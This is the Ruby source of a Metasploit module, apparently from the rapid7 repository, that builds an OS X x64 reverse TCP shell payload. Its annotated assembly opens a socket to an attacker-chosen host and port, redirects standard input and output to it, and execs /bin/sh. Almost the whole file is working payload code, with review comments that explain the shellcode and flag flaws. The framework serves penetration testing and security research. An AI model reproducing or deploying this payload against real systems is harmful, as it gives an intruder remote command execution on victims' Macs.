GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
module MetasploitModule
  # Byte size of the payload produced with the default options (presumably
  # the default CMD '/bin/sh'); since #generate embeds CMD verbatim, any
  # other CMD yields a different size.
  CachedSize = 128

  include Msf::Payload::Single
  include Msf::Payload::Osx
  include Msf::Sessions::CommandShellOptions

  # Registers module metadata and the datastore options that #generate
  # reads: CMD (program to exec), LHOST and LPORT (listener to connect
  # back to).
  #
  # @param info [Hash] module info merged with the defaults below
  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'OS X x64 Shell Reverse TCP',
        'Description' => 'Connect back to attacker and spawn a command shell',
        'Author' => 'nemo <nemo[at]felinemenace.org>',
        'License' => MSF_LICENSE,
        'Platform' => 'osx',
        'Arch' => ARCH_X64,
        'Handler' => Msf::Handler::ReverseTcp,
        'Session' => Msf::Sessions::CommandShellUnix
      )
    )

    # exec payload options
    register_options(
      [
        OptString.new('CMD', [ true, 'The command string to execute', '/bin/sh' ]),
        Opt::LHOST,
        Opt::LPORT(4444)
      ]
    )
  end

  # build the shellcode payload dynamically based on the user-provided CMD
  #
  # The x86-64 stub is assembled with Metasm at generation time; the
  # listener sockaddr and the CMD string are embedded as an immediate and an
  # inline `db`, so both are present in cleartext in the emitted bytes
  # (useful for triage/signature work on captured samples).
  #
  # @param _opts [Hash] unused; kept for the Msf::Payload#generate interface
  # @return [String] raw machine code
  # @raise [ArgumentError] if LHOST is not a dotted-quad IPv4 address
  def generate(_opts = {})
    lhost = datastore['LHOST'] || '127.0.0.1'
    # OptAddress allows either an IP or hostname, we only want IPv4
    unless Rex::Socket.is_ipv4?(lhost)
      raise ArgumentError, 'LHOST must be in IPv4 format.'
    end

    # NUL-terminate so execve sees a C string. The `db` line below appends
    # another 0x00, so the path ends up double-terminated (harmless).
    # NOTE(review): CMD is interpolated into the assembler source unescaped;
    # a '"' or backslash in CMD corrupts the db directive (assembly error or
    # altered bytes) instead of being passed through to execve.
    cmd = (datastore['CMD'] || '') + "\x00"
    # Low dword of the sockaddr_in immediate: LPORT little-endian followed by
    # 2 big-endian, read back as one big-endian word. Written to the stack
    # little-endian this becomes 02 00 <port hi> <port lo>, i.e. sin_len=2,
    # sin_family=0, sin_port in network order. NOTE(review): sin_family is 0
    # rather than AF_INET=2; presumably the XNU connect path tolerates
    # AF_UNSPEC here — confirm before relying on this encoding.
    encoded_port = [datastore['LPORT'].to_i, 2].pack('vn').unpack1('N')
    # addr_aton gives network-order bytes; reading them as a little-endian
    # dword means the immediate lands in memory in the original byte order.
    encoded_host = Rex::Socket.addr_aton(lhost).unpack1('V')
    # 64-bit immediate: host in the high dword, port/family in the low dword.
    encoded_host_port = format('0x%.8x%.8x', encoded_host, encoded_port)

    # Stub sequence (syscall numbers are XNU BSD-class, 0x2000000 | nr):
    #   socket(2, 1, 0)             0x2000061; fd kept in r12
    #   connect(fd, &sa, 16)        0x2000062; sa is 8 zero bytes (sin_zero)
    #                               then the immediate above, built on the
    #                               stack via the two pushes
    #   dup2(fd, 2), (fd, 1), (fd, 0)  0x200005a; stderr/stdout/stdin -> socket
    #   execve(cmd, [cmd, NULL], NULL) 0x200003b; `call load_cmd` pushes the
    #                               address of the inline string, which the
    #                               `pop rdi` after the label turns into the
    #                               path and argv[0]; rdx=0 is both the argv
    #                               terminator and envp
    shell_asm = %(
      mov eax,0x2000061
      push 0x2
      pop rdi
      push 0x1
      pop rsi
      xor rdx,rdx
      syscall
      mov r12,rax
      mov rdi,rax
      mov eax,0x2000062
      xor rsi,rsi
      push rsi
      mov rsi, #{encoded_host_port}
      push rsi
      mov rsi,rsp
      push 0x10
      pop rdx
      syscall
      mov rdi,r12
      mov eax,0x200005a
      mov rsi,2
      syscall
      mov eax,0x200005a
      mov rsi,1
      syscall
      mov eax,0x200005a
      mov rsi,0
      syscall
      xor rax,rax
      mov eax,0x200003b
      call load_cmd
      db "#{cmd}", 0x00
      load_cmd:
      pop rdi
      xor rdx,rdx
      push rdx
      push rdi
      mov rsi,rsp
      syscall
    )

    # Assemble and return the raw bytes; no encoder is applied here.
    Metasm::Shellcode.assemble(Metasm::X64.new, shell_asm).encode_string
  end
end